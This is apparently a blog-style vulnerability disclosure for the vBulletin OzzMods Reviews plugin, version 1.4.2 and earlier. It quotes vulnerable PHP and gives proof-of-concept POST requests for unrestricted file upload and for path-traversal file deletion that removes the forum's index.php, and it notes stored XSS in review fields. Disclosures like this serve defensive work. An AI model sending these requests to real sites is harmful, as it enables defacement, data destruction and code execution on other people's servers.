vBulletin OzzMods Reviews Plugin – XSS, Arbitrary File Upload & Deletion

Plugin: http://www.vbulletin.org/forum/showthread.php?t=304317
Version: <= 1.4.2, patched in 1.4.3 (latest) Arbitrary File Upload
Vulnerability resides in the /reviews_usercp.php file, around line 525 to 539.

		$audio = $_FILES['audio'];
		$filename = md5(time() + rand());
		$file_ext = strtolower(get_ext($audio[name]));
		$audio = $filename.'.'.$file_ext;
		require_once(DIR . '/christeris/reviews/includes/class.upload.php');
		$handle = new upload($_FILES['audio']);
		if ($handle->uploaded)
		{
			$handle->file_new_name_body = $filename;
			$handle->file_new_name_ext = $file_ext;
			$handle->Process(DIR . '/christeris/reviews/audio/');
			$handle-> Clean();
		} else {
			$audio = $oldaudio;
		}

As you can see, there’s no file extension check.
To abuse this, simply create or update a review and add a file upload field with the name audio.
After you submit the form, go back to the edit form and you can simply find the location of your uploaded file in the form.

Proof of concept:

POST to: 	http://example.com/reviews_usercp.php?do=saveupdate
POST data: 	categoryid:	1
		audio:		
		reviewid:	0
		userid:		1
		urlid:		1
		securitytoken:	yoursecuritytoken

Arbitrary File Deletion
Vulnerability resides in the /reviews_usercp.php file as well, around line 474 to 482.

        // Manage Logo
        $oldlogo = $vbulletin->GPC['oldlogo'];

        $removelogo = $vbulletin->GPC['removelogo'];
        if ($removelogo == 1)
        {
            unlink("christeris/reviews/photos/$oldlogo");
            unlink("christeris/reviews/photos/thumbs/$oldlogo");
            $oldlogo = '';
        }

No extension check, no file existence check and no check if the file belongs to the current user.
Proof of concept:

POST to: 	http://example.com/reviews_usercp.php?do=saveupdate
POST data: 	categoryid:	1
		oldlogo:	../../../index.php
		removelogo:	1
		reviewid:	0
		userid:		1
		urlid:		1
		securitytoken:	yoursecuritytoken

This will delete the index.php file in the root of the forum.

Cross Site Scripting
Pretty much all fields are vulnerable to XSS as well.
Just inject it into the keywords or positive/negative points fields.

Images
Arbitrary File Upload
OzzModz Review Arbitrary File Upload

Leave a Reply

Your email address will not be published / Required fields are marked *